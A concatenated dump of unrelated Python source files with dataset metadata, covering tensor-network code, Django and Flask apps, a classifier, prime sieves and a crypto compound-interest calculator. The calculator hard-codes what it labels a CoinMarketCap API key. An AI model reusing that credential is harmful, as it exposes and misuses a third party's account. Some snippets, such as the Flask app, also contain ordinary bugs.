M.shape[0], M.shape[0]), dtype = np.complex_)\r\n\t\t\r\n\t\tT_prime += np.einsum('qj,ip->ijpq', I, np.conj(M[:,:,a].T))\r\n\t\tT_prime -= np.einsum('pi,qj->ijpq', I, np.conj(M[:,:,a].T)) \r\n\t\t\r\n\t\tT_prime_norm = np.einsum('ijpq, klpq->ijkl', T, np.conj(T))\r\n\t\t\r\n\t\t\r\n\t\tS += T_norm\r\n\t\tS += T_prime_norm\r\n\t\r\n\tS = merge_axes(S, 0, 1)\r\n\tS = merge_axes(S, 1, 2)\r\n\t\r\n\teigenval, eigenvec = np.linalg.eig(S)\r\n\t\r\n\t#Find a random Hermitian matrix in the commutant.\r\n\t\r\n\tsmall_vecs = [ eigenvec[:,i] for i in range(len(eigenval)) if np.abs(eigenval[i]) < epsilon ]\r\n\t\r\n\tn_small = len(small_vecs)\r\n\t\r\n\t\r\n\trandom_vec = np.random.standard_normal(n_small)\r\n\trandom_vec = random_vec / np.sqrt(np.sum(random_vec**2))\r\n\t\r\n\trandom_X = np.zeros(M.shape[0]**2, dtype = np.complex_)\r\n\t\r\n\tfor i in range(n_small):\r\n\t\trandom_X += random_vec[i] * small_vecs[i]\r\n\t\r\n\t\r\n\trandom_X = split_axes(random_X, 0, M.shape[0], M.shape[0])\r\n\t\r\n\trandom_H = (random_X + np.conj(random_X.T) )/2\r\n\t\r\n\t#This matrix should approximately commute with M[:,:,a]\r\n\t\r\n\t#for a in range(M.shape[2]):\r\n\t#\tcommute = np.einsum(\"ij,jk->ik\", random_H, M[:,:,a]) - np.einsum(\"ij,jk->ik\", M[:,:,a], random_H)\r\n\t#\tcommute_size = np.sqrt( np.sum(commute**2) )\r\n\t#\tif commute_size > epsilon:\r\n\t#\t\tpdb.set_trace()\r\n\t\r\n\t\r\n\t#Diaogalize this matrix\r\n\tW, V = np.linalg.eigh(random_H)\r\n\t\r\n\treturn V\r\n\t\r\n#Find orthonormal bases such that M is in finest block-diagonal form\r\ndef block_diagonal_form(M, epsilon = 1e-5):\r\n\t\r\n\t#M = np.einsum('a,y,ayi->ayi', alpha, eta, M)\r\n\tleft_matrices = np.einsum('aki,bkj->abij', M, np.conj(M))\r\n\tleft_matrices = merge_axes(left_matrices, 2, 3)\r\n\t\r\n\tright_matrices = np.einsum('kai,kbj->abij', np.conj(M), M)\r\n\tright_matrices = merge_axes(right_matrices, 2, 3)\r\n\t\r\n\t#Maybe I should replace this with epsilon**2....\r\n\tP = block_diagonal_square_matrices(left_matrices, epsilon)\r\n\tQ = block_diagonal_square_matrices(right_matrices, epsilon)\r\n\t\r\n\treturn P, Q\r\n\t\r\n\t\r\n\t\r\ndef num_blocks(gamma, epsilon = 1e-5):\r\n\t\r\n\tP,Q = block_diagonal_form(gamma, epsilon)\r\n\tgamma_temp = np.einsum('ab, bci, cd->adi', np.conj(P.T), gamma, Q)\r\n\t\r\n\ttemp_alpha = np.einsum('ayi,ayi->a', gamma_temp, np.conj(gamma_temp))\r\n\ttemp_eta = np.einsum('ayi,ayi->y', gamma_temp, np.conj(gamma_temp))\r\n\t\r\n\tblocks = find_blocks(temp_alpha, gamma_temp, temp_eta, epsilon)\r\n\t\r\n\treturn len(blocks)\r\n\t\r\n#Returns a list [num_blocks] tallying the number of blocks\r\n#in the finest block decomposition of gamma[i]\r\ndef num_blocks_list(gamma_list, lmbda_list, epsilon = 1e-5):\r\n\t\r\n\tnum_blocks = [0]\r\n\t\r\n\tfor i in range(1, len(gamma_list) - 1):\r\n\t\t\r\n\t\tgamma_temp = np.einsum('a,ayi,y->ayi', lmbda_list[i - 1], gamma_list[i], lmbda_list[i])\r\n\t\tbond_dim = gamma_temp.shape[0]\r\n\t\r\n\t\t\r\n\t\tP,Q = block_diagonal_form(gamma_temp)\r\n\t\t\r\n\t\tgamma_temp = np.einsum('ab,bci,cd->adi', np.conj(P.T), gamma_temp, Q)\r\n\t\t\r\n\t\ttemp_alpha = np.einsum('ayi,ayi->a', gamma_temp, np.conj(gamma_temp))\r\n\t\ttemp_eta = np.einsum('ayi,ayi->y', gamma_temp, np.conj(gamma_temp))\r\n\r\n\t\t\r\n\t\tblocks = find_blocks(temp_alpha, gamma_temp, temp_eta, epsilon)\r\n\t\t\r\n\t\tnum_blocks.append(len(blocks))\r\n\t\t\r\n\tnum_blocks.append(0)\r\n\t\t\r\n\treturn num_blocks\r\n\t\t\r\n\r\n#Returns the 'block decomposition' of gamma. Projects onto the particular blocks\r\n#at site i, returns lmbda_lists and gamma_lists for each block\r\ndef block_decomposition(gamma_list_in, lmbda_list_in, i, epsilon = 1e-5):\r\n\t\r\n\tgamma_list = copy.deepcopy(gamma_list_in)\r\n\tlmbda_list = copy.deepcopy(lmbda_list_in)\r\n\t\r\n\tgamma_list[i] = np.einsum('a,ayi,y->ayi', lmbda_list[i - 1], gamma_list[i], lmbda_list[i])\r\n\t\r\n\tbond_dim = gamma_list[i].shape[0]\r\n\t\r\n\tlmbda_list[i - 1] = np.array([1 for k in range(bond_dim)])\r\n\tlmbda_list[i] = np.array([1 for k in range(bond_dim)])\r\n\t\r\n\tP,Q = block_diagonal_form(gamma_list[i])\r\n\t\r\n\tgamma_list[i] = np.einsum('ab,bci,cd->adi', np.conj(P.T), gamma_list[i], Q)\r\n\tgamma_list[i - 1] = np.einsum('abi,bc->aci', gamma_list[i - 1], P)\r\n\tgamma_list[i + 1] = np.einsum('ab,bci->aci', np.conj(Q.T), gamma_list[i + 1])\r\n\t\r\n\t#Just going to find temporary lmbdas for purposes of block-finding...\r\n\t\r\n\ttemp_alpha = np.einsum('ayi,ayi->a', gamma_list[i], np.conj(gamma_list[i]))\r\n\ttemp_eta = np.einsum('ayi,ayi->y', gamma_list[i], np.conj(gamma_list[i]))\r\n\t\r\n\tblocks = find_blocks(temp_alpha, gamma_list[i], temp_eta, epsilon)\r\n\t\r\n\tdecomp_list = []\r\n\tfor block in blocks:\r\n\t\tgamma_block, lmbda_block = project_onto_block(gamma_list, lmbda_list, block, i)\r\n\t\tdecomp_list.append((gamma_block, lmbda_block))\r\n\t\t\r\n\treturn decomp_list\r\n\r\n\r\n\t\r\n#Given M, returns block decomposition\r\n#in form [blocks] Each entry in blocks is a tuple of form \r\n#( [3,4,1],[7,5,2] ) for instance, entries in each tuple are coordinates of\r\n#each block on x, y axes respectively. \r\ndef find_blocks(alpha, M, eta, epsilon = 1e-5):\r\n\t\r\n\tM_norms = np.abs(np.einsum('abi,abi->ab', M, np.conj(M)))\r\n\t\r\n\tL = M_norms.shape[0]\r\n\tx_indices = list(range(L))\r\n\ty_indices = list(range(L))\r\n\t\r\n\tx_indices = [x for x in x_indices if np.abs(alpha[x])**2 > epsilon]\r\n\ty_indices = [y for y in y_indices if np.abs(eta[y])**2 > epsilon]\r\n\t\r\n\tblocks = []\r\n\t\r\n\twhile x_indices != []:\r\n\t\t\r\n\t\tx_unexplored = [x_indices[0]]\r\n\t\tx_indices.pop(0)\r\n\t\ty_unexplored = []\r\n\t\t\r\n\t\tx_explored = []\r\n\t\ty_explored = []\r\n\t\t\r\n\t\twhile x_unexplored != [] or y_unexplored != []:\r\n\t\t\t\r\n\t\t\tif x_unexplored != []:\r\n\t\t\t\r\n\t\t\t\tx0 = x_unexplored.pop(0)\r\n\t\t\t\tx_explored.append(x0)\r\n\t\t\t\t\r\n\t\t\t\tnew_y_indices = [y for y in y_indices if M_norms[x0,y] > epsilon]\r\n\t\t\t\ty_unexplored = y_unexplored + new_y_indices\r\n\t\t\t\ty_indices = [y for y in y_indices if not(y in new_y_indices)]\r\n\r\n\t\t\tif y_unexplored != []:\r\n\t\t\t\r\n\t\t\t\ty0 = y_unexplored.pop(0)\r\n\t\t\t\ty_explored.append(y0)\r\n\t\t\t\t\r\n\t\t\t\tnew_x_indices = [x for x in x_indices if M_norms[x,y0] > epsilon]\r\n\t\t\t\tx_unexplored = x_unexplored + new_x_indices\r\n\t\t\t\tx_indices = [x for x in x_indices if not(x in new_x_indices)]\r\n\t\t\t\t\r\n\t\t\t\t\r\n\t\tblocks.append( (x_explored, y_explored) )\r\n\t\t\r\n\treturn blocks\r\n\t\r\n\t\r\n\t\r\n#Project onto a particular block at site i. block is a tuple of \r\n#x and y coordinates of the block at site gamma[i]\r\ndef project_onto_block(gamma_list_in, lmbda_list_in, block, i):\r\n\t\r\n\tgamma_list = copy.deepcopy(gamma_list_in)\r\n\tlmbda_list = copy.deepcopy(lmbda_list_in)\r\n\t\r\n\tL = len(gamma_list)\r\n\t\r\n\tfor k in range(len(lmbda_list[i - 1])):\r\n\t\tif not(k in block[0]):\r\n\t\t\tlmbda_list[i - 1][k] = 0\r\n\t\t\t\r\n\t#lmbda_list[i - 1] = lmbda_list[i - 1] / np.sqrt(np.sum(lmbda_list[i - 1]**2))\r\n\t\t\t\r\n\tfor k in range(len(lmbda_list[i])):\r\n\t\tif not(k in block[1]):\r\n\t\t\tlmbda_list[i][k] = 0\r\n\t\t\t\r\n\t#lmbda_list[i] = lmbda_list[i] / np.sqrt(np.sum(lmbda_list[i]**2))\r\n\t\r\n\tnew_gamma_norm = np.einsum('a,y,ayi,ayi->',lmbda_list[i-1]**2, lmbda_list[i]**2, gamma_list[i], np.conj(gamma_list[i]))\r\n\t\r\n\tif new_gamma_norm < 1e-12:\r\n\t\tgamma_list[i] = np.zeros(gamma_list[i].shape)\r\n\telse:\t\r\n\t\tgamma_list[i] = gamma_list[i] / np.sqrt(new_gamma_norm)\r\n\t\r\n\t#Update left Schmidt decompositions\r\n\t\r\n\tfor k in range(i - 1, -1, -1): \r\n\t\tgamma_list[k], lmbda_list[k], gamma_list[k + 1] = \\\r\n\t\t\tupdate_schmidt_left(gamma_list[k], lmbda_list[k], gamma_list[k + 1], lmbda_list[k + 1])\r\n\t\t\r\n\t#Right schmidt decompositions\r\n\tfor k in range(i, L - 1):\r\n\t\tgamma_list[k], lmbda_list[k], gamma_list[k + 1] = \\\r\n\t\t\tupdate_schmidt_right( lmbda_list[k - 1], gamma_list[k], lmbda_list[k], gamma_list[k + 1])\r\n\t\r\n\t\r\n\treturn gamma_list, lmbda_list\r\n\r\n\t\r\n\t","sub_path":"MPS.py","file_name":"MPS.py","file_ext":"py","file_size_in_byte":18900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"386870574","text":"import numpy as np\ninit=1000\ncol=10\na=np.dtype([('id',\"i\"),('event',\"i\"), ('x',\"d\"), ('y',\"d\"), ('z',\"d\"),('time', \"d\")]);\n\ns=np.zeros(col)\nprint(s)\nfor i in range (0,col):\n data=np.fromfile(\"data/Electron\"+str(i+1)+\".bin\",a);\n for j in range(0,init):\n temp=np.unique(data[data['event']==j]['id'])\n s[i]=s[i]+temp.size/init\nnp.savetxt(\"VaryingData.txt\",s)\n","sub_path":"cxx/source/Timur_ukv/scripts/ReadBin.py","file_name":"ReadBin.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"602062596","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0008_auto_20161224_2056'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('remit', '0018_auto_20160807_1748'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Marcs',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('subject', models.CharField(max_length=130)),\n ('stud_reg', models.CharField(max_length=130)),\n ('level', models.CharField(default=False, max_length=2, blank=True)),\n ('marcs', models.CharField(default=False, max_length=30, blank=True)),\n ('added', models.DateTimeField(default=django.utils.timezone.now)),\n ('location', models.CharField(default=False, max_length=600, blank=True)),\n ('clas', models.ForeignKey(to='accounts.Profile')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'permissions': (('view_marcs', 'View Marcs'), ('edit_marcs', 'Edit Marcs'), ('view_marcs', 'View Marcs')),\n },\n bases=(models.Model,),\n ),\n ]\n","sub_path":"remit/migrations/0019_marcs.py","file_name":"0019_marcs.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"63781215","text":"from sklearn.svm import LinearSVC\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.externals import joblib\n\nimport numpy as np\n# import matplotlib.pyplot as plt\nimport time\n\ncar_features = np.load(file='../saved_features/rgb_all/car_features.npy')\nnon_car_features = np.load(file='../saved_features/rgb_all/non_car_features.npy')\n\nprint(car_features.shape)\nprint(non_car_features.shape)\n\n\nx = np.vstack((car_features, non_car_features)).astype(np.float64)\n# Fit a per-column scaler\nx_scaler = StandardScaler().fit(x)\n# Apply the scaler to X\nscaled_x = x_scaler.transform(x)\n\n# Define the labels vector\ny = np.hstack((np.ones(len(car_features)), np.zeros(len(non_car_features))))\n\n# Split up data into randomized training and test sets\nrand_state = np.random.randint(0, 100)\nx_train, x_test, y_train, y_test = train_test_split(scaled_x, y,\n test_size=0.2, random_state=rand_state)\n\nprint('Feature vector length:', len(x_train[0]))\n# Use a linear SVC\nsvc = LinearSVC()\n# Check the training time for the SVC\nt = time.time()\nsvc.fit(x_train, y_train)\nt2 = time.time()\nprint(round(t2-t, 2), 'Seconds to train SVC...')\n# Check the score of the SVC\nprint('Test Accuracy of SVC = ', round(svc.score(x_test, y_test), 4))\n# Check the prediction time for a single sample\nt = time.time()\nn_predict = 10\nprint('My SVC predicts: ', svc.predict(x_test[0:n_predict]))\nprint('For these', n_predict, 'labels: ', y_test[0:n_predict])\nt2 = time.time()\nprint(round(t2-t, 5), 'Seconds to predict', n_predict, 'labels with SVC')\n\njoblib.dump(svc, '../saved_models/svc_rgb_all.pkl')\njoblib.dump(x_scaler, '../saved_models/x_scaler_rgb_all.pkl')\n\n","sub_path":"classification/svc_classify.py","file_name":"svc_classify.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"378429150","text":"from math import sqrt\nfrom numpy import arange\n\ndef primes(n):\n m = [True] * (n+1)\n mx = int(sqrt(n))\n ps = [2]\n for i in range(3,mx+1,2):\n for j in range(i*i,n+1,i):\n m[j] = False\n for i in range(3,n+1,2):\n if m[i]:\n ps.append(i)\n return ps\n\n\ndef primes_npy(n):\n m = arange(n+1)\n mx = int(sqrt(n))\n m[arange(4, n+1, 2)] = 0\n for d in range(3,mx+1,2):\n zs = arange(d*d, n+1, d)\n m[zs] = 0\n return m[m >= 2]\n\n\nif __name__ == '__main__':\n import sys\n if sys.argv[1] == '1':\n print(sum(primes(2000000)))\n elif sys.argv[1] == '2':\n print(primes_npy(2000000).sum())\n\n\n\n\n\n","sub_path":"euler10.py","file_name":"euler10.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"53457222","text":"__author__ = 'Reece'\n\nfrom pygame.locals import *\nimport sys\n\n\n#abstract game state class\nclass GameState(object):\n def __init__(self, game, gui):\n self.game = game\n self.gui = gui\n\n def handle_key_input(self, event):\n if event.type == QUIT or (\n event.type == KEYDOWN and event.key == K_ESCAPE\n ):\n sys.exit(0)\n","sub_path":"game_states/super_state.py","file_name":"super_state.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"163174584","text":"# 1. Генерується список випадкових цілих чисел. Визначається, скільки в ньому парних чисел, а скільки непарних.\n# 2. Вихідний список містить позитивні і негативні числа. Потрібно позитивні помістити в один список, а негативні - в інший.\n# 3. Дан список цілих чисел. Замінити негативні на -1, позитивні - на число 1, нуль залишити без змін.\n# 4. Вводиться нормалізований текст, який крім слів може містити певні знаки пунктуації. Програма будує список слів, знаки пунктуації виключаються.\n# Під нормалізованим текстом будемо розуміти текст, в якому пробіл ставиться після знаків пунктуації, за винятком відкриває дужки (пробіл перед нею).\nstr = input(\"Write down or insert some text:\\n\")\npunctuation = ['.',',',':',';','!','?','(',')']\nfor i in punctuation:\n str = str.replace(i, \" \")\nwordList = str.split()\nprint(wordList)\n","sub_path":"hw05/dlobo/005_Task4.py","file_name":"005_Task4.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"568665268","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nwarning = \"==============================================\\n\" \\\n \"ASSUMPTIONS:\\n\" \\\n \"-Daily interest is consistent and predictable.\\n\" \\\n \"-Daily profits will be reinvested constantly.\\n\" \\\n \"==============================================\\n\"\n\nprint(warning)\n\n# make drop-down and search UI.\ncoin_type = input(\"Coin: \")\n\n# ensure your amounts are constantly calculating and updating.\nbaseline = 200\nbaseline_daily_interest = 0.0440\nbaseline_weekly_interest = 0.36\nbaseline_monthly_interest = 1.40\nbaseline_yearly_interest = 16.78\n\nbaseline_daily_interest_rate = 1 / (baseline / baseline_daily_interest) * 100\nbaseline_yearly_interest_rate = 1 / (baseline / baseline_yearly_interest) * 100\n\nprint(\"Daily interest: \" + str(baseline_daily_interest_rate) + \"%\")\nprint(\"Weekly interest: \" + str(1 / (baseline / baseline_weekly_interest) * 100) + \"%\")\nprint(\"Monthly interest: \" + str(1 / (baseline / baseline_monthly_interest) * 100) + \"%\")\nprint(\"Yearly interest: \" + str(baseline_yearly_interest_rate) + \"%\")\n\n# ============== #\n\nyear = 365\nmonth = 31\nweek = 7\n\n\ndef check_compound(time_frame, baseline, baseline_daily_interest_rate, return_data=False):\n \"\"\"\n :param time_frame: int. number of days.\n :param baseline: int. investment amount.\n :param baseline_interest_rate: int. percentage. should be way below 1.\n :return:\n \"\"\"\n # Day 1:\n daily_interest = baseline * baseline_daily_interest_rate\n amount = baseline + daily_interest\n y_coins = [amount-baseline]\n for i in range(time_frame - 1):\n daily_interest = amount * baseline_daily_interest_rate / 100\n amount += daily_interest\n gains = amount - baseline\n y_coins.append(gains)\n interest = amount - baseline\n interest_rate = 1 / (baseline / interest) * 100\n\n # plotting\n x_days = np.asarray(list(range(time_frame)))\n y_coins = np.asarray(y_coins)\n print(x_days.shape)\n print(y_coins.shape)\n graph = plt.plot(x_days, y_coins)\n plt.show(graph)\n\n if return_data:\n return interest_rate, interest, x_days, y_coins\n else:\n return interest_rate, interest\n\n\ncompound_rate, compound_amount, x, y = check_compound(year * 100, 2000, baseline_daily_interest_rate, True)\nprint(\"Compound rate = \" + str(compound_rate) + \" %\")\nprint(\"Interest = \" + str(compound_amount) + \" \" + coin_type)\n\nprint(x, y)\n\nrun_status = True\nwhile run_status:\n year = input(\"Check your profits in x years: \")\n if year in [\"Y\", \"y\"]:\n run_status = False\n else:\n year = float(int(year))\n print(\"Gains in \" + str(year) + \" years: \" + str(y[round(365 * year)]))\n\n\n# COINMARKETCAP API. pro.coinmarketcap.com/account\nAPI_key = \"6d7f5365-d3c4-4210-804e-c3c36302499d\"","sub_path":"src/ops/compound_interest.py","file_name":"compound_interest.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"209516311","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n\n# Copyright (c) 2013 Eric F Figerson\n# Author(s):\n# Eric F \n\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\nimport setuptools\nimport re\nimport sys\nimport facct as package\n\nsqllite_req = []\nif sys.version_info.major <= 2:\n sqllite_req = ['pysqlite']\n\nsetuptools.setup(\n name = package.__name__,\n version = package.__version__,\n description = package.__doc__.partition('\\n\\n')[0],\n long_description = package.__doc__.partition('\\n\\n')[2],\n author = package.__author__,\n author_email = package.__author_email__,\n license = package.__license__,\n url = package.__url__,\n classifiers = re.findall(r'\\S[^\\n]*', package.__classifiers__),\n packages = setuptools.find_packages(),\n include_package_data = True,\n zip_safe = True,\n install_requires = sqllite_req,\n)\n","sub_path":"pypi_install_script/facct-0.1.6.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"70408728","text":"from typing import Iterator\n\nfrom rx import config\nfrom rx.concurrency.schedulerbase import SchedulerBase\nfrom rx.core import Disposable\nfrom rx.disposables import BooleanDisposable\n\nfrom rxbackpressure.ack import Continue, Stop\nfrom rxbackpressure.observable import Observable\nfrom rxbackpressure.observer import Observer\nfrom rxbackpressure.scheduler import SchedulerBase, ExecutionModel\n\n\nclass IteratorAsObservable(Observable):\n def __init__(self, iterator: Iterator, on_finish: Disposable = Disposable.empty()):\n self.iterator = iterator\n self.on_finish = on_finish\n\n self.lock = config['concurrency'].RLock()\n\n def unsafe_subscribe(self, observer: Observer, scheduler: SchedulerBase,\n subscribe_scheduler: SchedulerBase):\n\n try:\n # todo: is the lock necessary? lock only needed to verify that subscribed once...\n with self.lock:\n item = next(self.iterator)\n has_next = True\n except StopIteration:\n has_next = False\n except Exception as e:\n # stream errors\n observer.on_error(e)\n return Disposable.empty()\n\n try:\n if not has_next:\n observer.on_completed()\n return Disposable.empty()\n else:\n disposable = BooleanDisposable()\n\n def action(_, __):\n # start sending items\n self.fast_loop(item, observer, scheduler, disposable, scheduler.get_execution_model(),\n sync_index=0)\n\n subscribe_scheduler.schedule(action)\n return disposable\n except:\n raise Exception('fatal error')\n\n def trigger_cancel(self, scheduler: SchedulerBase):\n try:\n self.on_finish.dispose()\n except Exception as e:\n scheduler.report_failure(e)\n\n def reschedule(self, ack, next_item, observer, scheduler: SchedulerBase, disposable, em: ExecutionModel):\n def on_next(next):\n if isinstance(next, Continue):\n try:\n self.fast_loop(next_item, observer, scheduler, disposable, em, sync_index=0)\n except Exception as e:\n self.trigger_cancel(scheduler)\n scheduler.report_failure(e)\n else:\n self.trigger_cancel(scheduler)\n\n def on_error(err):\n self.trigger_cancel(scheduler)\n scheduler.report_failure(err)\n\n ack.observe_on(scheduler).subscribe(on_next=on_next, on_error=on_error)\n\n def fast_loop(self, current_item, observer, scheduler: SchedulerBase,\n disposable: BooleanDisposable, em: ExecutionModel, sync_index: int):\n while True:\n try:\n with self.lock:\n next_item = next(self.iterator)\n has_next = True\n except StopIteration:\n has_next = False\n except Exception as e:\n # stream errors == True\n self.trigger_cancel(scheduler)\n\n if not disposable.is_disposed:\n observer.on_error(e)\n else:\n scheduler.report_failure(e)\n\n try:\n ack = observer.on_next(current_item)\n\n if not has_next:\n try:\n self.on_finish.dispose()\n except Exception as e:\n observer.on_error(e)\n else:\n observer.on_completed()\n break\n else:\n if isinstance(ack, Continue):\n next_index = em.next_frame_index(sync_index)\n elif isinstance(ack, Stop):\n next_index = -1\n else:\n next_index = 0\n\n if next_index > 0:\n current_item = next_item\n sync_index = next_index\n elif next_index == 0 and not disposable.is_disposed:\n self.reschedule(ack, next_item, observer, scheduler, disposable, em)\n break\n else:\n self.trigger_cancel(scheduler)\n break\n except:\n raise Exception('fatal error')\n","sub_path":"rxbackpressure/observables/iteratorasobservable.py","file_name":"iteratorasobservable.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"364549417","text":"\ndef largest_area(heights):\n stack, area = [], 0\n for i, h in enumerate(heights + [0]):\n while stack and h <= heights[stack[-1]]:\n height = heights[stack.pop()]\n width = i - stack[-1] - 1 if stack else i\n area = max(area, height * width)\n stack.append(i)\n return area\n \n \ndef maximal_rectangle(matrix):\n if not matrix:\n return 0\n \n result, heights = 0, [0] * len(matrix[0])\n for i in xrange(len(matrix)):\n for j in xrange(len(matrix[0])):\n heights[j] = heights[j] + 1 if matrix[i][j] == \"1\" else 0\n result = max(result, largest_area(heights))\n return result\n","sub_path":"Python/85_maximal_rectangle.py","file_name":"85_maximal_rectangle.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"296460972","text":"from flask import Flask, jsonify, request\r\nimport json\r\n\r\n\r\napp = Flask(__name__)\r\n\r\n\r\n'''\r\nTakes a list of keywords and\r\nreturns the similarity\r\n'''\r\n\r\n\r\ndef similiarity(keywords1, keywords2):\r\n counter = 0\r\n for word in keywords1:\r\n if word in keywords2:\r\n counter += 2\r\n return 1.0*counter/(len(keywords1) + len(keywords2))\r\n\r\n\r\n'''\r\nTakes a string of text that represents a question and store it\r\nalso compare the string to all existing strings\r\n'''\r\n\r\n\r\n@app.rout('/getText', methods=['POST', 'GET'])\r\ndef getText():\r\n # compare text to all strings\r\n # questions.json stores all the questions\r\n # key is the question and value is the list of keywords\r\n if request.method == 'POST':\r\n question = json.dumps(request.json['question'])\r\n # EXTRACT KEYWORDS FROM question\r\n keywords = []\r\n with open('questions.json') as f:\r\n quest = json.loads(f)\r\n\r\n for questionToCompare in quest:\r\n s = similiarity(keywords, quest[questionToCompare])\r\n if s > 0.5:\r\n # we need to return a positive count\r\n return {\"count\": 1}\r\n # at this point the question is new\r\n quest[question] = keywords\r\n with open('questions.json', 'w') as f:\r\n json.dump(quest, f)\r\n return {\"count\": 0}\r\n\r\n\r\nif __name__ == '__main__':\r\n app.run(host='0.0.0.0', port=80)\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"206444169","text":"from django.conf.urls import patterns, url\n#from wkhtmltopdf.views import PDFTemplateView\n\n\nurlpatterns = patterns('',\n url(r'^$', 'app.views.index', name='index'),\n url(r'^create/$', 'app.views.create', name='create'),\n url(r'^consult/$', 'app.views.consult', name='consult'),\n url(r'^edit/(?P[0-9]+)/$', 'app.views.edit', name='edit'),\n url(r'^pdf/(?P[0-9]+)/$', 'app.views.pdf', name='pdf'),\n url(r'^confirm/(?P[0-9]+)/$', 'app.views.confirm', name='confirm'),\n url(r'^delete/(?P[0-9]+)/$', 'app.views.delete', name='delete'),\n #url(r'^pdf/(?P[0-9]+)/$', PDFTemplateView.as_view(template_name='pdf.html', filename='my_pdf.pdf'), name='pdf'),\n)\n","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"632369334","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom atividade.sql import *\n\nfrom desenvolvedor.models import Desenvolvedor\nfrom requisito.models import Requisito\nfrom atividade.models import Atividade\nfrom atividade.forms import AtividadeForm\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\n\n\ndef show(request, atividade_id):\n request.session['atividade_id'] = atividade_id\n atividade = Atividade.objects.get(id=atividade_id)\n return render(request, 'atividade/show.html', {'atividade': atividade})\n\n\ndef new(request):\n form = AtividadeForm()\n return render(request, 'atividade/new.html', {'form': form})\n\n\ndef create(request):\n form = AtividadeForm(request.POST)\n if form.is_valid():\n dados = form.cleaned_data\n Atividade(dev_id_id=request.session['desenvolvedor_id'], req_id_id=request.session['requisito_id'],\n descricao=dados['descricao'],\n data_inicio=dados['data_inicio'], data_fim=dados['data_fim'], prazo=dados['prazo']).save()\n messages.success(request, 'Atividade criada com sucesso')\n return redirect('requisito_show', request.session['requisito_id'])\n else:\n messages.warning(request, 'Formulário inválido')\n return redirect('atividade_new')\n\n\ndef edit(request):\n dados = atividade_join_requisito(request.session['atividade_id'])\n form = AtividadeForm(dados)\n return render(request, 'atividade/edit.html', {'form': form, 'dados': dados})\n\n\ndef update(request):\n antiga_atividade = Atividade.objects.get(id=request.session['atividade_id'])\n atividade_atualizada = AtividadeForm(request.POST, instance=antiga_atividade)\n if atividade_atualizada.is_valid():\n atividade_atualizada.save()\n messages.success(request, 'Atividade atualizada com sucesso')\n else:\n messages.warning(request, 'Falha na atualização da Atividade')\n return redirect('atividade_show', request.session['atividade_id'])\n\n\ndef delete(request):\n Atividade.objects.get(id=request.session['atividade_id']).delete()\n del request.session['atividade_id']\n messages.success(request, 'Atividade apagada com sucesso')\n return redirect('requisito_show', request.session['requisito_id'])\n","sub_path":"ref-mac0350/mac0350fase3/atividade/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"333241184","text":"import os\nimport time\n\nfrom flask import render_template, request, redirect, url_for, Blueprint, flash\nfrom flask.ext.login import current_user\n\nfrom MORTWebsite.sql.ORM import BlogPost, User\nfrom MORTWebsite import db\nfrom MORTWebsite.utilities.permissions import cms_access_required, cms_admin_required\nfrom MORTWebsite.utilities.renderer import new_post_to_file, updated_post_to_file\nfrom MORTWebsite import forms\nfrom MORTWebsite.utilities.helpers import flash_errors, dfm_mode_checker\nfrom MORTWebsite.sql.ORM import PostCategories\nfrom MORTWebsite.utilities.server_logger import log_event\n\nblog = Blueprint('blog', __name__, url_prefix='/blog')\n\n\n# Index page for 